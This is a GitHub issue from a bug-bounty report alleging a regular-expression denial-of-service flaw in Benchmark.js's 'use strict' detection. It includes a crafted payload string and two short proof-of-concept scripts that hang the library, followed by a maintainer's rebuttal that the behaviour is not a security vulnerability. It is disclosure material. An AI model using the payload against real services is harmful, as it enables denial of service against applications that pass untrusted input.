Skip to content
This repository has been archived by the owner on Apr 11, 2024. It is now read-only.

huntr - Regular expression Denial of Service (ReDoS) #229

Open
huntr-helper opened this issue Mar 27, 2020 · 2 comments
Open

huntr - Regular expression Denial of Service (ReDoS) #229

huntr-helper opened this issue Mar 27, 2020 · 2 comments

Comments

@huntr-helper
Copy link

This issue has been generated on-behalf of snoopysecurity (https://huntr.dev/app/users/snoopysecurity)

Vulnerability Description

It is possible to insert an evil regex as part of benchmark options such as setup, fn, fnArg ,teardown which can be used to conduct denial of service attacks benchmarkjs. This is possible because the regex use to check use strict string allows multiple repetitions of '***//' which allows Catastrophic Backtracking.

Steps To Reproduce:

Simple PoC

This is a PoC of the extracted regex use to simply demonstrate that the ReDoS is possible. Benchmark is used here simply to measure time

var normal_payload = `
"use strict";
myFunction();
`
var redos = '/****//**//****//**//****//**//****//**//****//**//****//**//****//**//****//**//*\*/ /*//**//**//*_*//**/*//';
//normal test
console.time('benchmark');
/^(?:\/\*+[\w\W]*?\*\/|\/\/.*?[\n\r\u2028\u2029]|\s)*(["'])use strict\1;?$/.test(normal_payload);
console.timeEnd('benchmark');

//exploit payload
console.time('benchmark');
/^(?:\/\*+[\w\W]*?\*\/|\/\/.*?[\n\r\u2028\u2029]|\s)*(["'])use strict\1;?$/.test(redos);
console.timeEnd('benchmark');

Package PoC

This PoC demonstrates the malicious regex being inserted as part of potential user input.This hangs

var redos = '/****//**//****//**//****//**//****//**//****//**//****//**//****//**//****//**//*\*/ /*//**//**//*_*//**/*//';
var Benchmark = require('benchmark');
var bench = Benchmark({
        redos : true,
        'setup': redos,
        'fn': 'throw a;',
        'teardown': 'a = 2;'

      }).run()

console.log(bench);

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
@mathiasbynens
Copy link
Member

If you know of a way to change the regular expression to not have catastrophic backtracking, we'd certainly accept a patch. But note that this is not a security vulnerability in Benchmark.js. For example, it's also possible to benchmark the snippet while (true);, which has the same "DoS" effect. It's up to the application that uses Benchmark.js to ensure it's not run with untrusted content or, in this case, with untrusted options.

@JamieSlome
Copy link

JamieSlome commented Mar 30, 2020
edited

@mathiasbynens - re: the backtracking, we will keep the bug bounty up on https://huntr.dev and review some of the suggestions provided by the security community! 🍰

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@mathiasbynens @JamieSlome @huntr-helper